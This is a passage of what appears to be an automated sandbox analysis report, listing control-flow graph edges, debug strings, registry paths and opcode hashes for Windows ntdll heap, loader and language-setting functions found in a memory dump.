36e09987-36e09989 619->627 623 36e09946-36e0994d 620->623 624 36e0994f-36e0996e 620->624 629 36e09c11-36e09c1e 621->629 630 36e09c0c 621->630 655 36e09cb6 622->655 656 36e09cbb-36e09cc2 622->656 623->624 631 36e099d9-36e099f6 RtlDebugPrintTimes 624->631 635 36e099bd-36e099bf 626->635 633 36e0998b-36e0998d 627->633 634 36e0998f 627->634 641 36e09c20-36e09c23 629->641 642 36e09c2a-36e09c2d 629->642 630->629 631->558 659 36e099fc-36e09a1f call 36da9020 631->659 643 36e09ced 632->643 633->626 634->626 639 36e099c1-36e099d7 635->639 640 36e0999a-36e099a4 635->640 639->631 652 36e099a6 640->652 653 36e099ad 640->653 641->642 650 36e09c39-36e09c7b 642->650 651 36e09c2f-36e09c32 642->651 649 36e09cf1-36e09d06 RtlDebugPrintTimes 643->649 644->558 686 36e09ba4 644->686 645->590 657 36e0986b-36e09880 647->657 658 36e0981d-36e09825 647->658 649->558 649->645 650->649 651->650 652->639 661 36e099a8-36e099ab 652->661 663 36e099af-36e099b1 653->663 655->656 664 36e09cc4-36e09ccb 656->664 665 36e09ccd 656->665 660 36e09886-36e09894 657->660 666 36e09852-36e09869 658->666 667 36e09827-36e09850 call 36e08513 658->667 683 36e09a21-36e09a3b 659->683 684 36e09a3d-36e09a58 659->684 670 36e09898-36e098ef call 36da9020 RtlDebugPrintTimes 660->670 661->663 672 36e099b3-36e099b5 663->672 673 36e099bb 663->673 674 36e09cd1-36e09cd7 664->674 665->674 666->660 667->670 670->558 689 36e098f5-36e098f7 670->689 672->673 679 36e099b7-36e099b9 672->679 673->635 680 36e09cd9-36e09cdc 674->680 681 36e09cde-36e09ce4 674->681 679->635 680->632 681->643 682 36e09ce6 681->682 682->632 687 36e09a5d-36e09a8b RtlDebugPrintTimes 683->687 684->687 686->607 687->558 691 36e09a91-36e09a97 687->691 689->645 691->618
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $ $0
                                                • API String ID: 3446177414-3352262554
                                                • Opcode ID: 7cdef2eab59d3535b42a801bfbfd253cab59ea60bb5b13e66a4e12e586f86e76
                                                • Instruction ID: 02b3346d02ecf972e151aad3c318abcde7b3391ebcceda2116cf2e7ce28b4864
                                                • Opcode Fuzzy Hash: 7cdef2eab59d3535b42a801bfbfd253cab59ea60bb5b13e66a4e12e586f86e76
                                                • Instruction Fuzzy Hash: D33223B1A083818FE310CF6AC984B4BBBE5BB88348F14592DF5998B390D775D948CF52
                                                Function 36E10274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1296 36e10274-36e10296 call 36db7e54 1299 36e102b5-36e102cd call 36d576b2 1296->1299 1300 36e10298-36e102b0 RtlDebugPrintTimes 1296->1300 1304 36e102d3-36e102e9 1299->1304 1305 36e106f7 1299->1305 1306 36e10751-36e10760 1300->1306 1307 36e102f0-36e102f2 1304->1307 1308 36e102eb-36e102ee 1304->1308 1309 36e106fa-36e1074e call 36e10766 1305->1309 1310 36e102f3-36e1030a 1307->1310 1308->1310 1309->1306 1312 36e106b1-36e106ba GetPEB 1310->1312 1313 36e10310-36e10313 1310->1313 1315 36e106d9-36e106de call 36d5b970 1312->1315 1316 36e106bc-36e106d7 GetPEB call 36d5b970 1312->1316 1313->1312 1317 36e10319-36e10322 1313->1317 1324 36e106e3-36e106f4 call 36d5b970 1315->1324 1316->1324 1321 36e10324-36e1033b call 36d6ffb0 1317->1321 1322 36e1033e-36e10351 call 36e10cb5 1317->1322 1321->1322 1331 36e10353-36e1035a 1322->1331 1332 36e1035c-36e10370 call 36d5758f 1322->1332 1324->1305 1331->1332 1335 36e105a2-36e105a7 1332->1335 1336 36e10376-36e10382 GetPEB 1332->1336 1335->1309 1339 36e105ad-36e105b9 GetPEB 1335->1339 1337 36e103f0-36e103fb 1336->1337 1338 36e10384-36e10387 1336->1338 1344 36e10401-36e10408 1337->1344 1345 36e104e8-36e104fa call 36d727f0 1337->1345 1340 36e103a6-36e103ab call 36d5b970 1338->1340 1341 36e10389-36e103a4 GetPEB call 36d5b970 1338->1341 1342 36e10627-36e10632 1339->1342 1343 36e105bb-36e105be 1339->1343 1358 36e103b0-36e103d1 call 36d5b970 GetPEB 1340->1358 1341->1358 1342->1309 1346 36e10638-36e10643 1342->1346 1348 36e105c0-36e105db GetPEB call 36d5b970 1343->1348 1349 36e105dd-36e105e2 call 36d5b970 1343->1349 1344->1345 1352 36e1040e-36e10417 1344->1352 1368 36e10590-36e1059d call 36e111a4 call 36e10cb5 1345->1368 1369 36e10500-36e10507 1345->1369 1346->1309 1355 36e10649-36e10654 1346->1355 1367 36e105e7-36e105fb call 36d5b970 1348->1367 1349->1367 1353 36e10419-36e10429 1352->1353 1354 36e10438-36e1043c 1352->1354 1353->1354 1361 36e1042b-36e10435 call 36e1dac6 1353->1361 1363 36e1044e-36e10454 1354->1363 1364 36e1043e-36e1044c call 36d93bc9 1354->1364 1355->1309 1362 36e1065a-36e10663 GetPEB 1355->1362 1358->1345 1389 36e103d7-36e103eb 1358->1389 1361->1354 1372 36e10682-36e10687 call 36d5b970 1362->1372 1373 36e10665-36e10680 GetPEB call 36d5b970 1362->1373 1375 36e10457-36e10460 1363->1375 1364->1375 1399 36e105fe-36e10608 GetPEB 1367->1399 1368->1335 1378 36e10512-36e1051a 1369->1378 1379 36e10509-36e10510 1369->1379 1396 36e1068c-36e106ac call 36e086ba call 36d5b970 1372->1396 1373->1396 1387 36e10472-36e10475 1375->1387 1388 36e10462-36e10470 1375->1388 1380 36e10538-36e1053c 1378->1380 1381 36e1051c-36e1052c 1378->1381 1379->1378 1393 36e1056c-36e10572 1380->1393 1394 36e1053e-36e10551 call 36d93bc9 1380->1394 1381->1380 1391 36e1052e-36e10533 call 36e1dac6 1381->1391 1397 36e104e5 1387->1397 1398 36e10477-36e1047e 1387->1398 1388->1387 1389->1345 1391->1380 1405 36e10575-36e1057c 1393->1405 1410 36e10563 1394->1410 1411 36e10553-36e10561 call 36d8fe99 1394->1411 1396->1399 1397->1345 1398->1397 1404 36e10480-36e1048b 1398->1404 1399->1309 1400 36e1060e-36e10622 1399->1400 1400->1309 1404->1397 1408 36e1048d-36e10496 GetPEB 1404->1408 1405->1368 1409 36e1057e-36e1058e 1405->1409 1413 36e104b5-36e104ba call 36d5b970 1408->1413 1414 36e10498-36e104b3 GetPEB call 36d5b970 1408->1414 1409->1368 1418 36e10566-36e1056a 1410->1418 1411->1418 1421 36e104bf-36e104dd call 36e086ba call 36d5b970 1413->1421 1414->1421 1418->1405 1421->1397
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                • API String ID: 3446177414-1700792311
                                                • Opcode ID: 42951c49093ee5e72976e4b95bc1f4884636cbe09675eb93e308bb2f8f0c7995
                                                • Instruction ID: b4c9567f440f683975b2058d5ef713e444e1fc49a173701565276aad193575fd
                                                • Opcode Fuzzy Hash: 42951c49093ee5e72976e4b95bc1f4884636cbe09675eb93e308bb2f8f0c7995
                                                • Instruction Fuzzy Hash: A9D14339910384EFDB12CF66C850AADBBF2FF0A309F458049E5459BA51CB34D88ADF61
                                                Function 36E0F525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                • API String ID: 3446177414-1745908468
                                                • Opcode ID: a89351c01df0a8fbc8252c0fbb8c3d3b84a10a34f74e7a136f30ec0608acd3b1
                                                • Instruction ID: f022d8fcc4cd4ee256a8d9f06c6c9e4c576e1a3ab02788a5e8a185882edea309
                                                • Opcode Fuzzy Hash: a89351c01df0a8fbc8252c0fbb8c3d3b84a10a34f74e7a136f30ec0608acd3b1
                                                • Instruction Fuzzy Hash: 3A911135910640DFDB02CF6AC840ADDBBF2FF4A708F158059E944AB6A1CB35D859CF61
                                                Function 36E112ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                • API String ID: 0-3591852110
                                                • Opcode ID: 5bbf261f302ac3d93797d32e2437f537b7a971638510b4cc7ca8d231c34454e7
                                                • Instruction ID: 46893182b0a467c9ebbb9ce91e2730e2ee55abbd582e5189bfb0166db7d5622f
                                                • Opcode Fuzzy Hash: 5bbf261f302ac3d93797d32e2437f537b7a971638510b4cc7ca8d231c34454e7
                                                • Instruction Fuzzy Hash: 7F12CF78A00745EFE7158F25C440BAABFF1FF09318F558459E4868BA81D734E889EB91
                                                Function 36D5D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                • API String ID: 0-3532704233
                                                • Opcode ID: 5681db89ba9fc022659c580429c9858abc257484115f320680d83c3e2cb9e0c9
                                                • Instruction ID: 795e1c46827d7afe9fab842dcdd481b166f281727f5c2221737255e0a0ab3208
                                                • Opcode Fuzzy Hash: 5681db89ba9fc022659c580429c9858abc257484115f320680d83c3e2cb9e0c9
                                                • Instruction Fuzzy Hash: 21B1EF759083559FEB11CF24C840A1FBBE8EF88744F42092EF988D7608DB70D949CBA6
                                                Function 36D71070 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                • API String ID: 3446177414-3570731704
                                                • Opcode ID: f55db6c970ea90933cb3bcee5e635b61bd8144d881af38c6b347abf86b36f649
                                                • Instruction ID: c5200999426311c300c037f85e56acfae584c98cf446fa3b1407176ad2e500f0
                                                • Opcode Fuzzy Hash: f55db6c970ea90933cb3bcee5e635b61bd8144d881af38c6b347abf86b36f649
                                                • Instruction Fuzzy Hash: 53925875E11328CFEB24CF15CC40B99BBB6AF45354F1582EAD949AB290DB309E84CF52
                                                Function 36D8D7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlDebugPrintTimes.NTDLL ref: 36D8D959
                                                  • Part of subcall function 36D64859: RtlDebugPrintTimes.NTDLL ref: 36D648F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-1975516107
                                                • Opcode ID: bf0435d329a317e45769286512bb3e734711187ff48e96b85cd6028e449e19b7
                                                • Instruction ID: 6bb08bb0074ebc17c350860720df9e421554942b377a3db4792b0fc46a23277a
                                                • Opcode Fuzzy Hash: bf0435d329a317e45769286512bb3e734711187ff48e96b85cd6028e449e19b7
                                                • Instruction Fuzzy Hash: 4951D276E00345DFEB18DFA4C88878EBBB2BF44314F245159C6116B289D774E949CF91
                                                Function 36DF9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                • API String ID: 0-3063724069
                                                • Opcode ID: 02107bb6379231aabeffb26f250fde20fb0a17900c555b624cdeead0827c68b4
                                                • Instruction ID: 272390b9284da8ebc7309c1b2e406b760d84b4e2ea45434e4bb70b64333d5896
                                                • Opcode Fuzzy Hash: 02107bb6379231aabeffb26f250fde20fb0a17900c555b624cdeead0827c68b4
                                                • Instruction Fuzzy Hash: B7D1C0B2C29311AFE721CB54C840B6BB7E8AF84754F420929F985AF250D735C948CBE3
                                                Function 36D5D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                Download Yara Rule
                                                Strings
                                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 36D5D0CF
                                                • @, xrefs: 36D5D0FD
                                                • @, xrefs: 36D5D313
                                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 36D5D196
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 36D5D2C3
                                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 36D5D146
                                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 36D5D262
                                                • @, xrefs: 36D5D2AF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                • API String ID: 0-1356375266
                                                • Opcode ID: 2331b7867f66e8c4b05a74649b0c92006f6fe61d085a3a801ddf3f7f3c1ddcf3
                                                • Instruction ID: 363fba4b56325bb40d66f2bd59bba55d04f6c9c0b3f6f73dc7876e78ddf70f00
                                                • Opcode Fuzzy Hash: 2331b7867f66e8c4b05a74649b0c92006f6fe61d085a3a801ddf3f7f3c1ddcf3
                                                • Instruction Fuzzy Hash: E7A17AB18083459FE721CF21C880B5BBBE8BB84755F51492EF68897644E774D908CFA7
                                                Function 36D5F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-523794902
                                                • Opcode ID: 53ba50caa909d879c5de86f29afab7c28130c58af3546925f32bcf281000c21a
                                                • Instruction ID: 0976dc54ac6bc72099c7b2396fee4588981f5552d856889c5200c7d34eb77fe9
                                                • Opcode Fuzzy Hash: 53ba50caa909d879c5de86f29afab7c28130c58af3546925f32bcf281000c21a
                                                • Instruction Fuzzy Hash: 1542FEB56083819FEB05CF25C880A2ABBE5FF88384F154969E586CFB51DB34D845CF62
                                                Function 36D7B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                • API String ID: 0-122214566
                                                • Opcode ID: 2cf8dc2241fbf2c874ca026ff054da90c3742f9150185a90f958b741fbeed392
                                                • Instruction ID: 3a2f2e5c5c5144e2523ad750851ef6c7f72de54e79f56f2dec158f3f29d7ebe8
                                                • Opcode Fuzzy Hash: 2cf8dc2241fbf2c874ca026ff054da90c3742f9150185a90f958b741fbeed392
                                                • Instruction Fuzzy Hash: 84C12A71E05319AFEB148F65CC80B7E7BB5AF49308F644069E845DB290DB74C985C7A3
                                                Function 36D70770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                • Opcode ID: 6299d76c49b0aae5fb57523e13f6dd1a25bd95a8fb3e3028a423f55fa22c082f
                                                • Instruction ID: 62888cc9c3ab2bb6948761e52dc8cc09f48db32ef65148502d50a2ce99c91b28
                                                • Opcode Fuzzy Hash: 6299d76c49b0aae5fb57523e13f6dd1a25bd95a8fb3e3028a423f55fa22c082f
                                                • Instruction Fuzzy Hash: ADF1CDB4A00609DFEB15CF69D894F6AB7F5FF44304F2482A8E4459B391DB30E991CB92
                                                Function 36D8F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 36DD031E
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 36DD02BD
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 36DD02E7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: cd54692290661fb16e4be4a7df15eb05d6d4352a9f7562b5e3b838ca288b71c3
                                                • Instruction ID: e6d98440d41263afe5b01e3dfefacc1d5441448570f1b6d473a506c7661c3ac7
                                                • Opcode Fuzzy Hash: cd54692290661fb16e4be4a7df15eb05d6d4352a9f7562b5e3b838ca288b71c3
                                                • Instruction Fuzzy Hash: 54E1BD74A087419FE311DF29D885B1AB7F0BF84398F200A19E5A48B2E0DB74D845CB92
                                                Function 36D851EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                Download Yara Rule
                                                Strings
                                                • Kernel-MUI-Language-Allowed, xrefs: 36D8527B
                                                • WindowsExcludedProcs, xrefs: 36D8522A
                                                • Kernel-MUI-Language-SKU, xrefs: 36D8542B
                                                • Kernel-MUI-Number-Allowed, xrefs: 36D85247
                                                • Kernel-MUI-Language-Disallowed, xrefs: 36D85352
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 0-258546922
                                                • Opcode ID: b2e6c43ca0098cfd9cf3d3275f5392ef38f5c8164384966556e8fc753656e74f
                                                • Instruction ID: 3c490707b3b310d7fd3cf5493348e40780e8aeffb58944dee88d1f2b395e4a27
                                                • Opcode Fuzzy Hash: b2e6c43ca0098cfd9cf3d3275f5392ef38f5c8164384966556e8fc753656e74f
                                                • Instruction Fuzzy Hash: 80F14CB6D11229EFDB01CFA9C984AEEBBB9FF48650F51415AE401E7210DB749E01CBA1
                                                Function 36E3B16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: 6fe1728d81f1609bc56970bbc853608c3305557fc46712a22dbb219c3b88d50e
                                                • Instruction ID: 1fe8376afe897d35f0a569721bb63b5cc6fbcd4143434663c58c1ae7d935bf87
                                                • Opcode Fuzzy Hash: 6fe1728d81f1609bc56970bbc853608c3305557fc46712a22dbb219c3b88d50e
                                                • Instruction Fuzzy Hash: 4DF12976E002259FDB08CF69C99067EFBF6EF98204B29426DD457DB380E634EA05CB50
                                                Function 36D576B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
